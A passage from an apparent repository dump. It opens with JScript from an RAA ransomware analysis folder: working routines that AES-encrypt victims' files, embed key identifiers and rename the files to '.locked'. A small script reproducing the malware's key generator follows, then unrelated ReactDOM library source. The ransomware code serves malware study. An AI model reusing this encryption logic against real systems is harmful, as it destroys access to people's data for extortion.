2040);\n            hXpHGpZ[0][0] = SlSPWu.ReadText(GinRqOjln) + \"RAA-SEP\";\n            var kWsAN = Math.floor(PRuJZyAvfeza / 2) - 3060;\n            hXpHGpZ[1][0] = SlSPWu.ReadText(kWsAN) + \"RAA-SEP\";\n            hXpHGpZ[0][1] = SlSPWu.ReadText(GinRqOjln) + \"RAA-SEP\";\n            var iPZDBPG = PRuJZyAvfeza - (SlSPWu.Position + GinRqOjln);\n            hXpHGpZ[1][1] = SlSPWu.ReadText(iPZDBPG) + \"RAA-SEP\";\n            hXpHGpZ[0][2] = SlSPWu.ReadText(GinRqOjln) + \"RAA-SEP\";\n            SlSPWu.Close;\n            jMvqmKSQu(hXpHGpZ);\n        } else if (PRuJZyAvfeza > 5000000 && PRuJZyAvfeza <= 500000000) {\n            qqJ(IMhTname)\n        } else if (PRuJZyAvfeza <= 6122) {\n            hXpHGpZ[0][0] = SlSPWu.ReadText;\n            SlSPWu.Close;\n            jMvqmKSQu(hXpHGpZ);\n        } else {\n            hXpHGpZ = 0;\n            SlSPWu.Close;\n            jMvqmKSQu(hXpHGpZ);\n        }\n        return 0;\n    }\n\n    udpIHxNm(IMhTname);\n    function qqJ(IMhTname) {\n        var SlSPWu = WScript.CreateObject(\"ADODB.Stream\");\n        SlSPWu.CharSet = '437';\n        SlSPWu.Open();\n        SlSPWu.LoadFromFile(IMhTname);\n        var FhDYKCTNZFu = WScript.CreateObject(\"ADODB.Stream\");\n        FhDYKCTNZFu.CharSet = '437';\n        FhDYKCTNZFu.Open();\n        var GinRqOjln = OQlYdejWlC(90000, 125000);\n        var PRuJZyAvfeza = SlSPWu.Size;\n        var VVe = SlSPWu.ReadText(GinRqOjln);\n        var cBKyRXWGPWBs = ukBnxEOtjm(VVe);\n        cBKyRXWGPWBs = String(cBKyRXWGPWBs);\n        var rMkTeqZm = cBKyRXWGPWBs.length;\n        SlSPWu.Position = PRuJZyAvfeza - GinRqOjln;\n        var ECgBWYtoib = SlSPWu.ReadText(GinRqOjln);\n        var AblANuF = ukBnxEOtjm(ECgBWYtoib);\n        AblANuF = String(AblANuF);\n        var QfYmGGcYOFB = AblANuF.length;\n        var IJDZ = \",\";\n        SlSPWu.Position = PRuJZyAvfeza - GinRqOjln;\n        SlSPWu.SetEOS;\n        SlSPWu.WriteText(cBKyRXWGPWBs);\n        SlSPWu.WriteText(AblANuF);\n        SlSPWu.WriteText(rMkTeqZm);\n        SlSPWu.WriteText(IJDZ);\n        SlSPWu.WriteText(QfYmGGcYOFB);\n        SlSPWu.WriteText(IJDZ);\n        var ids = \"IDNUM=\" + cVjZujcP + \"KEY_LOGIC=\" + HZtSmFNRdJM_data[0] + \"IV_LOGIC=\" + qPCIyff[0] + \"LOGIC_ID=3\";\n        SlSPWu.WriteText(ids);\n        SlSPWu.Position = GinRqOjln;\n        SlSPWu.CopyTo(FhDYKCTNZFu);\n        SlSPWu.Close;\n        FhDYKCTNZFu.SaveToFile(IMhTname, 2);\n        FhDYKCTNZFu.Close;\n        var DmYbWSaT = new ActiveXObject(\"Scripting.FileSystemObject\");\n        DmYbWSaT.MoveFile(IMhTname, IMhTname += \".locked\");\n        return 0;\n    }\n\n////jbnqLZNJJU8MXxfoAGPcb113j4K1XQ9IZWi4jg0f9sU3koQYuP0SF6ueN09SHxD8wbODMwlbiIkVALIpWt54jq6\n    function jMvqmKSQu(hXpHGpZ) {\n        if (hXpHGpZ[1].length != 0) {\n            var DftonCbPCyQR = hXpHGpZ[0].join(\"\");\n            DftonCbPCyQR = ukBnxEOtjm(DftonCbPCyQR);\n            DftonCbPCyQR = DftonCbPCyQR + \"=END=OF=HEADER=\";\n            DftonCbPCyQR = DftonCbPCyQR + hXpHGpZ[1].join(\"\") + \"IDNUM=\" + cVjZujcP + \"KEY_LOGIC=\" + HZtSmFNRdJM_data[0] + \"IV_LOGIC=\" + qPCIyff[0] + \"LOGIC_ID=1\";\n            omaDplUyHou(DftonCbPCyQR);\n        } else if (hXpHGpZ == 0) {\n            var DftonCbPCyQR = 0;\n            omaDplUyHou(DftonCbPCyQR);\n        } else {\n            var DftonCbPCyQR = hXpHGpZ[0][0];\n            DftonCbPCyQR = ukBnxEOtjm(DftonCbPCyQR);\n            DftonCbPCyQR = DftonCbPCyQR + \"IDNUM=\" + cVjZujcP + \"KEY_LOGIC=\" + HZtSmFNRdJM_data[0] + \"IV_LOGIC=\" + qPCIyff[0] + \"LOGIC_ID=2\";\n            omaDplUyHou(DftonCbPCyQR);\n        }\n        return DftonCbPCyQR;\n    }\n\n    function ukBnxEOtjm(EQs) {\n        var HZtSmFNRdJM = HZtSmFNRdJM_data[1];\n        var gmCRXSMsLyM = qPCIyff[1];\n        EQs = CryptoJS.AES.encrypt(EQs, HZtSmFNRdJM, {gmCRXSMsLyM: gmCRXSMsLyM});\n        return EQs;\n    }\n\n    function omaDplUyHou(lsYZxzUm) {\n        var IxC = new ActiveXObject('ADODB.Stream');\n        IxC.Type = 2;\n        IxC.Charset = \"437\";\n        IxC.Open();\n        if (lsYZxzUm != 0) {\n            IxC.WriteText(lsYZxzUm);\n            IxC.SaveToFile(IMhTname, 2);\n            IxC.Close();\n            var DmYbWSaT = new ActiveXObject(\"Scripting.FileSystemObject\");\n            DmYbWSaT.MoveFile(IMhTname, IMhTname += \".locked\");\n        } else {\n            IxC.Close();\n        }\n        return 0;\n    }\n\n    return 0;\n}"
  },
  {
    "path": "raa-ransomware-analysis/work/tmp3.js",
    "content": "/**\n * Created by bl4de on 27.07.2016.\n */\nfunction rStinsVp(rand) {\n    var eqQu = [];\n    var EPtLPmand = -1;\n    do {\n        EPtLPmand += 1;\n        eqQu[EPtLPmand] = Math.floor((Math.random() * 2000) + 1);\n        if (eqQu[EPtLPmand] < 10) {\n            eqQu[EPtLPmand] = \"000\" + eqQu[EPtLPmand];\n        } else if (eqQu[EPtLPmand] >= 10 && eqQu[EPtLPmand] < 100) {\n            eqQu[EPtLPmand] = \"00\" + eqQu[EPtLPmand];\n        } else if (eqQu[EPtLPmand] >= 100 && eqQu[EPtLPmand] < 1000) {\n            eqQu[EPtLPmand] = \"0\" + eqQu[EPtLPmand];\n        } else {\n            eqQu[EPtLPmand] = eqQu[EPtLPmand];\n        }\n    } while (eqQu.length < 32);\n    var xjLCtcIO = \"\";\n    var EPtLPmand2 = -1;\n    var vPdyagHuFMMj = [];\n    do {\n        EPtLPmand2 += 1;\n        vPdyagHuFMMj[EPtLPmand2] = parseInt(eqQu[EPtLPmand2]);\n        xjLCtcIO = xjLCtcIO + rand.charAt(vPdyagHuFMMj[EPtLPmand2]);\n    } while (xjLCtcIO.length < 32);\n    var gieJISwveNlD = [];\n    gieJISwveNlD[0] = eqQu;\n    gieJISwveNlD[1] = xjLCtcIO;\n    return gieJISwveNlD;\n}\n\n\nconsole.log(rStinsVp(\"c2378574f4fa4a4353d1ab7e2961fd88\"));\n"
  },
  {
    "path": "simple-markdown-playground/react-dom.js",
    "content": " /**\n  * ReactDOM v15.6.1\n  */\n\n;(function(f) {\n  // CommonJS\n  if (typeof exports === \"object\" && typeof module !== \"undefined\") {\n    module.exports = f(require('react'));\n\n  // RequireJS\n  } else if (typeof define === \"function\" && define.amd) {\n    define(['react'], f);\n\n  // <script>\n  } else {\n    var g;\n    if (typeof window !== \"undefined\") {\n      g = window;\n    } else if (typeof global !== \"undefined\") {\n      g = global;\n    } else if (typeof self !== \"undefined\") {\n      g = self;\n    } else {\n      // works providing we're not in \"use strict\";\n      // needed for Java 8 Nashorn\n      // see https://github.com/facebook/react/issues/3037\n      g = this;\n    }\n    g.ReactDOM = f(g.React);\n  }\n})(function(React) {\n  return (function(f){return f()})(function(){var define,module,exports;return (function e(t,n,r){function s(o,u){if(!n[o]){if(!t[o]){var a=typeof require==\"function\"&&require;if(!u&&a)return a(o,!0);if(i)return i(o,!0);var f=new Error(\"Cannot find module '\"+o+\"'\");throw f.code=\"MODULE_NOT_FOUND\",f}var l=n[o]={exports:{}};t[o][0].call(l.exports,function(e){var n=t[o][1][e];return s(n?n:e)},l,l.exports,e,t,n,r)}return n[o].exports}var i=typeof require==\"function\"&&require;for(var o=0;o<r.length;o++)s(r[o]);return s})({1:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar ARIADOMPropertyConfig = {\n  Properties: {\n    // Global States and Properties\n    'aria-current': 0, // state\n    'aria-details': 0,\n    'aria-disabled': 0, // state\n    'aria-hidden': 0, // state\n    'aria-invalid': 0, // state\n    'aria-keyshortcuts': 0,\n    'aria-label': 0,\n    'aria-roledescription': 0,\n    // Widget Attributes\n    'aria-autocomplete': 0,\n    'aria-checked': 0,\n    'aria-expanded': 0,\n    'aria-haspopup': 0,\n    'aria-level': 0,\n    'aria-modal': 0,\n    'aria-multiline': 0,\n    'aria-multiselectable': 0,\n    'aria-orientation': 0,\n    'aria-placeholder': 0,\n    'aria-pressed': 0,\n    'aria-readonly': 0,\n    'aria-required': 0,\n    'aria-selected': 0,\n    'aria-sort': 0,\n    'aria-valuemax': 0,\n    'aria-valuemin': 0,\n    'aria-valuenow': 0,\n    'aria-valuetext': 0,\n    // Live Region Attributes\n    'aria-atomic': 0,\n    'aria-busy': 0,\n    'aria-live': 0,\n    'aria-relevant': 0,\n    // Drag-and-Drop Attributes\n    'aria-dropeffect': 0,\n    'aria-grabbed': 0,\n    // Relationship Attributes\n    'aria-activedescendant': 0,\n    'aria-colcount': 0,\n    'aria-colindex': 0,\n    'aria-colspan': 0,\n    'aria-controls': 0,\n    'aria-describedby': 0,\n    'aria-errormessage': 0,\n    'aria-flowto': 0,\n    'aria-labelledby': 0,\n    'aria-owns': 0,\n    'aria-posinset': 0,\n    'aria-rowcount': 0,\n    'aria-rowindex': 0,\n    'aria-rowspan': 0,\n    'aria-setsize': 0\n  },\n  DOMAttributeNames: {},\n  DOMPropertyNames: {}\n};\n\nmodule.exports = ARIADOMPropertyConfig;\n},{}],2:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar ReactDOMComponentTree = _dereq_(34);\n\nvar focusNode = _dereq_(146);\n\nvar AutoFocusUtils = {\n  focusDOMComponent: function () {\n    focusNode(ReactDOMComponentTree.getNodeFromInstance(this));\n  }\n};\n\nmodule.exports = AutoFocusUtils;\n},{\"146\":146,\"34\":34}],3:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar EventPropagators = _dereq_(20);\nvar ExecutionEnvironment = _dereq_(138);\nvar FallbackCompositionState = _dereq_(21);\nvar SyntheticCompositionEvent = _dereq_(89);\nvar SyntheticInputEvent = _dereq_(93);\n\nvar END_KEYCODES = [9, 13, 27, 32]; // Tab, Return, Esc, Space\nvar START_KEYCODE = 229;\n\nvar canUseCompositionEvent = ExecutionEnvironment.canUseDOM && 'CompositionEvent' in window;\n\nvar documentMode = null;\nif (ExecutionEnvironment.canUseDOM && 'documentMode' in document) {\n  documentMode = document.documentMode;\n}\n\n// Webkit offers a very useful `textInput` event that can be used to\n// directly represent `beforeInput`. The IE `textinput` event is not as\n// useful, so we don't use it.\nvar canUseTextInputEvent = ExecutionEnvironment.canUseDOM && 'TextEvent' in window && !documentMode && !isPresto();\n\n// In IE9+, we have access to composition events, but the data supplied\n// by the native compositionend event may be incorrect. Japanese ideographic\n// spaces, for instance (\\u3000) are not recorded correctly.\nvar useFallbackCompositionData = ExecutionEnvironment.canUseDOM && (!canUseCompositionEvent || documentMode && documentMode > 8 && documentMode <= 11);\n\n/**\n * Opera <= 12 includes TextEvent in window, but does not fire\n * text input events. Rely on keypress instead.\n */\nfunction isPresto() {\n  var opera = window.opera;\n  return typeof opera === 'object' && typeof opera.version === 'function' && parseInt(opera.version(), 10) <= 12;\n}\n\nvar SPACEBAR_CODE = 32;\nvar SPACEBAR_CHAR = String.fromCharCode(SPACEBAR_CODE);\n\n// Events and their corresponding property names.\nvar eventTypes = {\n  beforeInput: {\n    phasedRegistrationNames: {\n      bubbled: 'onBeforeInput',\n      captured: 'onBeforeInputCapture'\n    },\n    dependencies: ['topCompositionEnd', 'topKeyPress', 'topTextInput', 'topPaste']\n  },\n  compositionEnd: {\n    phasedRegistrationNames: {\n      bubbled: 'onCompositionEnd',\n      captured: 'onCompositionEndCapture'\n    },\n    dependencies: ['topBlur', 'topCompositionEnd', 'topKeyDown', 'topKeyPress', 'topKeyUp', 'topMouseDown']\n  },\n  compositionStart: {\n    phasedRegistrationNames: {\n      bubbled: 'onCompositionStart',\n      captured: 'onCompositionStartCapture'\n    },\n    dependencies: ['topBlur', 'topCompositionStart', 'topKeyDown', 'topKeyPress', 'topKeyUp', 'topMouseDown']\n  },\n  compositionUpdate: {\n    phasedRegistrationNames: {\n      bubbled: 'onCompositionUpdate',\n      captured: 'onCompositionUpdateCapture'\n    },\n    dependencies: ['topBlur', 'topCompositionUpdate', 'topKeyDown', 'topKeyPress', 'topKeyUp', 'topMouseDown']\n  }\n};\n\n// Track whether we've ever handled a keypress on the space key.\nvar hasSpaceKeypress = false;\n\n/**\n * Return whether a native keypress event is assumed to be a command.\n * This is required because Firefox fires `keypress` events for key commands\n * (cut, copy, select-all, etc.) even though no character is inserted.\n */\nfunction isKeypressCommand(nativeEvent) {\n  return (nativeEvent.ctrlKey || nativeEvent.altKey || nativeEvent.metaKey) &&\n  // ctrlKey && altKey is equivalent to AltGr, and is not a command.\n  !(nativeEvent.ctrlKey && nativeEvent.altKey);\n}\n\n/**\n * Translate native top level events into event types.\n *\n * @param {string} topLevelType\n * @return {object}\n */\nfunction getCompositionEventType(topLevelType) {\n  switch (topLevelType) {\n    case 'topCompositionStart':\n      return eventTypes.compositionStart;\n    case 'topCompositionEnd':\n      return eventTypes.compositionEnd;\n    case 'topCompositionUpdate':\n      return eventTypes.compositionUpdate;\n  }\n}\n\n/**\n * Does our fallback best-guess model think this event signifies that\n * composition has begun?\n *\n * @param {string} topLevelType\n * @param {object} nativeEvent\n * @return {boolean}\n */\nfunction isFallbackCompositionStart(topLevelType, nativeEvent) {\n  return topLevelType === 'topKeyDown' && nativeEvent.keyCode === START_KEYCODE;\n}\n\n/**\n * Does our fallback mode think that this event is the end of composition?\n *\n * @param {string} topLevelType\n * @param {object} nativeEvent\n * @return {boolean}\n */\nfunction isFallbackCompositionEnd(topLevelType, nativeEvent) {\n  switch (topLevelType) {\n    case 'topKeyUp':\n      // Command keys insert or clear IME input.\n      return END_KEYCODES.indexOf(nativeEvent.keyCode) !== -1;\n    case 'topKeyDown':\n      // Expect IME keyCode on each keydown. If we get any other\n      // code we must have exited earlier.\n      return nativeEvent.keyCode !== START_KEYCODE;\n    case 'topKeyPress':\n    case 'topMouseDown':\n    case 'topBlur':\n      // Events are not possible without cancelling IME.\n      return true;\n    default:\n      return false;\n  }\n}\n\n/**\n * Google Input Tools provides composition data via a CustomEvent,\n * with the `data` property populated in the `detail` object. If this\n * is available on the event object, use it. If not, this is a plain\n * composition event and we have nothing special to extract.\n *\n * @param {object} nativeEvent\n * @return {?string}\n */\nfunction getDataFromCustomEvent(nativeEvent) {\n  var detail = nativeEvent.detail;\n  if (typeof detail === 'object' && 'data' in detail) {\n    return detail.data;\n  }\n  return null;\n}\n\n// Track the current IME composition fallback object, if any.\nvar currentComposition = null;\n\n/**\n * @return {?object} A SyntheticCompositionEvent.\n */\nfunction extractCompositionEvent(topLevelType, targetInst, nativeEvent, nativeEventTarget) {\n  var eventType;\n  var fallbackData;\n\n  if (canUseCompositionEvent) {\n    eventType = getCompositionEventType(topLevelType);\n  } else if (!currentComposition) {\n    if (isFallbackCompositionStart(topLevelType, nativeEvent)) {\n      eventType = eventTypes.compositionStart;\n    }\n  } else if (isFallbackCompositionEnd(topLevelType, nativeEvent)) {\n    eventType = eventTypes.compositionEnd;\n  }\n\n  if (!eventType) {\n    return null;\n  }\n\n  if (useFallbackCompositionData) {\n    // The current composition is stored statically and must not be\n    // overwritten while composition continues.\n    if (!currentComposition && eventType === eventTypes.compositionStart) {\n      currentComposition = FallbackCompositionState.getPooled(nativeEventTarget);\n    } else if (eventType === eventTypes.compositionEnd) {\n      if (currentComposition) {\n        fallbackData = currentComposition.getData();\n      }\n    }\n  }\n\n  var event = SyntheticCompositionEvent.getPooled(eventType, targetInst, nativeEvent, nativeEventTarget);\n\n  if (fallbackData) {\n    // Inject data generated from fallback path into the synthetic event.\n    // This matches the property of native CompositionEventInterface.\n    event.data = fallbackData;\n  } else {\n    var customData = getDataFromCustomEvent(nativeEvent);\n    if (customData !== null) {\n      event.data = customData;\n    }\n  }\n\n  EventPropagators.accumulateTwoPhaseDispatches(event);\n  return event;\n}\n\n/**\n * @param {string} topLevelType Record from `EventConstants`.\n * @param {object} nativeEvent Native browser event.\n * @return {?string} The string corresponding to this `beforeInput` event.\n */\nfunction getNativeBeforeInputChars(topLevelType, nativeEvent) {\n  switch (topLevelType) {\n    case 'topCompositionEnd':\n      return getDataFromCustomEvent(nativeEvent);\n    case 'topKeyPress':\n      /**\n       * If native `textInput` events are available, our goal is to make\n       * use of them. However, there is a special case: the spacebar key.\n       * In Webkit, preventing default on a spacebar `textInput` event\n       * cancels character insertion, but it *also* causes the browser\n       * to fall back to its default spacebar behavior of scrolling the\n       * page.\n       *\n       * Tracking at:\n       * https://code.google.com/p/chromium/issues/detail?id=355103\n       *\n       * To avoid this issue, use the keypress event as if no `textInput`\n       * event is available.\n       */\n      var which = nativeEvent.which;\n      if (which !== SPACEBAR_CODE) {\n        return null;\n      }\n\n      hasSpaceKeypress = true;\n      return SPACEBAR_CHAR;\n\n    case 'topTextInput':\n      // Record the characters to be added to the DOM.\n      var chars = nativeEvent.data;\n\n      // If it's a spacebar character, assume that we have already handled\n      // it at the keypress level and bail immediately. Android Chrome\n      // doesn't give us keycodes, so we need to blacklist it.\n      if (chars === SPACEBAR_CHAR && hasSpaceKeypress) {\n        return null;\n      }\n\n      return chars;\n\n    default:\n      // For other native event types, do nothing.\n      return null;\n  }\n}\n\n/**\n * For browsers that do not provide the `textInput` event, extract the\n * appropriate string to use for SyntheticInputEvent.\n *\n * @param {string} topLevelType Record from `EventConstants`.\n * @param {object} nativeEvent Native browser event.\n * @return {?string} The fallback string for this `beforeInput` event.\n */\nfunction getFallbackBeforeInputChars(topLevelType, nativeEvent) {\n  // If we are currently composing (IME) and using a fallback to do so,\n  // try to extract the composed characters from the fallback object.\n  // If composition event is available, we extract a string only at\n  // compositionevent, otherwise extract it at fallback events.\n  if (currentComposition) {\n    if (topLevelType === 'topCompositionEnd' || !canUseCompositionEvent && isFallbackCompositionEnd(topLevelType, nativeEvent)) {\n      var chars = currentComposition.getData();\n      FallbackCompositionState.release(currentComposition);\n      currentComposition = null;\n      return chars;\n    }\n    return null;\n  }\n\n  switch (topLevelType) {\n    case 'topPaste':\n      // If a paste event occurs after a keypress, throw out the input\n      // chars. Paste events should not lead to BeforeInput events.\n      return null;\n    case 'topKeyPress':\n      /**\n       * As of v27, Firefox may fire keypress events even when no character\n       * will be inserted. A few possibilities:\n       *\n       * - `which` is `0`. Arrow keys, Esc key, etc.\n       *\n       * - `which` is the pressed key code, but no char is available.\n       *   Ex: 'AltGr + d` in Polish. There is no modified character for\n       *   this key combination and no character is inserted into the\n       *   document, but FF fires the keypress for char code `100` anyway.\n       *   No `input` event will occur.\n       *\n       * - `which` is the pressed key code, but a command combination is\n       *   being used. Ex: `Cmd+C`. No character is inserted, and no\n       *   `input` event will occur.\n       */\n      if (nativeEvent.which && !isKeypressCommand(nativeEvent)) {\n        return String.fromCharCode(nativeEvent.which);\n      }\n      return null;\n    case 'topCompositionEnd':\n      return useFallbackCompositionData ? null : nativeEvent.data;\n    default:\n      return null;\n  }\n}\n\n/**\n * Extract a SyntheticInputEvent for `beforeInput`, based on either native\n * `textInput` or fallback behavior.\n *\n * @return {?object} A SyntheticInputEvent.\n */\nfunction extractBeforeInputEvent(topLevelType, targetInst, nativeEvent, nativeEventTarget) {\n  var chars;\n\n  if (canUseTextInputEvent) {\n    chars = getNativeBeforeInputChars(topLevelType, nativeEvent);\n  } else {\n    chars = getFallbackBeforeInputChars(topLevelType, nativeEvent);\n  }\n\n  // If no characters are being inserted, no BeforeInput event should\n  // be fired.\n  if (!chars) {\n    return null;\n  }\n\n  var event = SyntheticInputEvent.getPooled(eventTypes.beforeInput, targetInst, nativeEvent, nativeEventTarget);\n\n  event.data = chars;\n  EventPropagators.accumulateTwoPhaseDispatches(event);\n  return event;\n}\n\n/**\n * Create an `onBeforeInput` event to match\n * http://www.w3.org/TR/2013/WD-DOM-Level-3-Events-20131105/#events-inputevents.\n *\n * This event plugin is based on the native `textInput` event\n * available in Chrome, Safari, Opera, and IE. This event fires after\n * `onKeyPress` and `onCompositionEnd`, but before `onInput`.\n *\n * `beforeInput` is spec'd but not implemented in any browsers, and\n * the `input` event does not provide any useful information about what has\n * actually been added, contrary to the spec. Thus, `textInput` is the best\n * available event to identify the characters that have actually been inserted\n * into the target node.\n *\n * This plugin is also responsible for emitting `composition` events, thus\n * allowing us to share composition fallback code for both `beforeInput` and\n * `composition` event types.\n */\nvar BeforeInputEventPlugin = {\n  eventTypes: eventTypes,\n\n  extractEvents: function (topLevelType, targetInst, nativeEvent, nativeEventTarget) {\n    return [extractCompositionEvent(topLevelType, targetInst, nativeEvent, nativeEventTarget), extractBeforeInputEvent(topLevelType, targetInst, nativeEvent, nativeEventTarget)];\n  }\n};\n\nmodule.exports = BeforeInputEventPlugin;\n},{\"138\":138,\"20\":20,\"21\":21,\"89\":89,\"93\":93}],4:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\n/**\n * CSS properties which accept numbers but are not in units of \"px\".\n */\n\nvar isUnitlessNumber = {\n  animationIterationCount: true,\n  borderImageOutset: true,\n  borderImageSlice: true,\n  borderImageWidth: true,\n  boxFlex: true,\n  boxFlexGroup: true,\n  boxOrdinalGroup: true,\n  columnCount: true,\n  flex: true,\n  flexGrow: true,\n  flexPositive: true,\n  flexShrink: true,\n  flexNegative: true,\n  flexOrder: true,\n  gridRow: true,\n  gridRowEnd: true,\n  gridRowSpan: true,\n  gridRowStart: true,\n  gridColumn: true,\n  gridColumnEnd: true,\n  gridColumnSpan: true,\n  gridColumnStart: true,\n  fontWeight: true,\n  lineClamp: true,\n  lineHeight: true,\n  opacity: true,\n  order: true,\n  orphans: true,\n  tabSize: true,\n  widows: true,\n  zIndex: true,\n  zoom: true,\n\n  // SVG-related properties\n  fillOpacity: true,\n  floodOpacity: true,\n  stopOpacity: true,\n  strokeDasharray: true,\n  strokeDashoffset: true,\n  strokeMiterlimit: true,\n  strokeOpacity: true,\n  strokeWidth: true\n};\n\n/**\n * @param {string} prefix vendor-specific prefix, eg: Webkit\n * @param {string} key style name, eg: transitionDuration\n * @return {string} style name prefixed with `prefix`, properly camelCased, eg:\n * WebkitTransitionDuration\n */\nfunction prefixKey(prefix, key) {\n  return prefix + key.charAt(0).toUpperCase() + key.substring(1);\n}\n\n/**\n * Support style names that may come passed in prefixed by adding permutations\n * of vendor prefixes.\n */\nvar prefixes = ['Webkit', 'ms', 'Moz', 'O'];\n\n// Using Object.keys here, or else the vanilla for-in loop makes IE8 go into an\n// infinite loop, because it iterates over the newly added props too.\nObject.keys(isUnitlessNumber).forEach(function (prop) {\n  prefixes.forEach(function (prefix) {\n    isUnitlessNumber[prefixKey(prefix, prop)] = isUnitlessNumber[prop];\n  });\n});\n\n/**\n * Most style properties can be unset by doing .style[prop] = '' but IE8\n * doesn't like doing that with shorthand properties so for the properties that\n * IE8 breaks on, which are listed here, we instead unset each of the\n * individual properties. See http://bugs.jquery.com/ticket/12385.\n * The 4-value 'clock' properties like margin, padding, border-width seem to\n * behave without any problems. Curiously, list-style works too without any\n * special prodding.\n */\nvar shorthandPropertyExpansions = {\n  background: {\n    backgroundAttachment: true,\n    backgroundColor: true,\n    backgroundImage: true,\n    backgroundPositionX: true,\n    backgroundPositionY: true,\n    backgroundRepeat: true\n  },\n  backgroundPosition: {\n    backgroundPositionX: true,\n    backgroundPositionY: true\n  },\n  border: {\n    borderWidth: true,\n    borderStyle: true,\n    borderColor: true\n  },\n  borderBottom: {\n    borderBottomWidth: true,\n    borderBottomStyle: true,\n    borderBottomColor: true\n  },\n  borderLeft: {\n    borderLeftWidth: true,\n    borderLeftStyle: true,\n    borderLeftColor: true\n  },\n  borderRight: {\n    borderRightWidth: true,\n    borderRightStyle: true,\n    borderRightColor: true\n  },\n  borderTop: {\n    borderTopWidth: true,\n    borderTopStyle: true,\n    borderTopColor: true\n  },\n  font: {\n    fontStyle: true,\n    fontVariant: true,\n    fontWeight: true,\n    fontSize: true,\n    lineHeight: true,\n    fontFamily: true\n  },\n  outline: {\n    outlineWidth: true,\n    outlineStyle: true,\n    outlineColor: true\n  }\n};\n\nvar CSSProperty = {\n  isUnitlessNumber: isUnitlessNumber,\n  shorthandPropertyExpansions: shorthandPropertyExpansions\n};\n\nmodule.exports = CSSProperty;\n},{}],5:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar CSSProperty = _dereq_(4);\nvar ExecutionEnvironment = _dereq_(138);\nvar ReactInstrumentation = _dereq_(64);\n\nvar camelizeStyleName = _dereq_(140);\nvar dangerousStyleValue = _dereq_(106);\nvar hyphenateStyleName = _dereq_(151);\nvar memoizeStringOnly = _dereq_(155);\nvar warning = _dereq_(159);\n\nvar processStyleName = memoizeStringOnly(function (styleName) {\n  return hyphenateStyleName(styleName);\n});\n\nvar hasShorthandPropertyBug = false;\nvar styleFloatAccessor = 'cssFloat';\nif (ExecutionEnvironment.canUseDOM) {\n  var tempStyle = document.createElement('div').style;\n  try {\n    // IE8 throws \"Invalid argument.\" if resetting shorthand style properties.\n    tempStyle.font = '';\n  } catch (e) {\n    hasShorthandPropertyBug = true;\n  }\n  // IE8 only supports accessing cssFloat (standard) as styleFloat\n  if (document.documentElement.style.cssFloat === undefined) {\n    styleFloatAccessor = 'styleFloat';\n  }\n}\n\nif (\"development\" !== 'production') {\n  // 'msTransform' is correct, but the other prefixes should be capitalized\n  var badVendoredStyleNamePattern = /^(?:webkit|moz|o)[A-Z]/;\n\n  // style values shouldn't contain a semicolon\n  var badStyleValueWithSemicolonPattern = /;\\s*$/;\n\n  var warnedStyleNames = {};\n  var warnedStyleValues = {};\n  var warnedForNaNValue = false;\n\n  var warnHyphenatedStyleName = function (name, owner) {\n    if (warnedStyleNames.hasOwnProperty(name) && warnedStyleNames[name]) {\n      return;\n    }\n\n    warnedStyleNames[name] = true;\n    \"development\" !== 'production' ? warning(false, 'Unsupported style property %s. Did you mean %s?%s', name, camelizeStyleName(name), checkRenderMessage(owner)) : void 0;\n  };\n\n  var warnBadVendoredStyleName = function (name, owner) {\n    if (warnedStyleNames.hasOwnProperty(name) && warnedStyleNames[name]) {\n      return;\n    }\n\n    warnedStyleNames[name] = true;\n    \"development\" !== 'production' ? warning(false, 'Unsupported vendor-prefixed style property %s. Did you mean %s?%s', name, name.charAt(0).toUpperCase() + name.slice(1), checkRenderMessage(owner)) : void 0;\n  };\n\n  var warnStyleValueWithSemicolon = function (name, value, owner) {\n    if (warnedStyleValues.hasOwnProperty(value) && warnedStyleValues[value]) {\n      return;\n    }\n\n    warnedStyleValues[value] = true;\n    \"development\" !== 'production' ? warning(false, \"Style property values shouldn't contain a semicolon.%s \" + 'Try \"%s: %s\" instead.', checkRenderMessage(owner), name, value.replace(badStyleValueWithSemicolonPattern, '')) : void 0;\n  };\n\n  var warnStyleValueIsNaN = function (name, value, owner) {\n    if (warnedForNaNValue) {\n      return;\n    }\n\n    warnedForNaNValue = true;\n    \"development\" !== 'production' ? warning(false, '`NaN` is an invalid value for the `%s` css style property.%s', name, checkRenderMessage(owner)) : void 0;\n  };\n\n  var checkRenderMessage = function (owner) {\n    if (owner) {\n      var name = owner.getName();\n      if (name) {\n        return ' Check the render method of `' + name + '`.';\n      }\n    }\n    return '';\n  };\n\n  /**\n   * @param {string} name\n   * @param {*} value\n   * @param {ReactDOMComponent} component\n   */\n  var warnValidStyle = function (name, value, component) {\n    var owner;\n    if (component) {\n      owner = component._currentElement._owner;\n    }\n    if (name.indexOf('-') > -1) {\n      warnHyphenatedStyleName(name, owner);\n    } else if (badVendoredStyleNamePattern.test(name)) {\n      warnBadVendoredStyleName(name, owner);\n    } else if (badStyleValueWithSemicolonPattern.test(value)) {\n      warnStyleValueWithSemicolon(name, value, owner);\n    }\n\n    if (typeof value === 'number' && isNaN(value)) {\n      warnStyleValueIsNaN(name, value, owner);\n    }\n  };\n}\n\n/**\n * Operations for dealing with CSS properties.\n */\nvar CSSPropertyOperations = {\n  /**\n   * Serializes a mapping of style properties for use as inline styles:\n   *\n  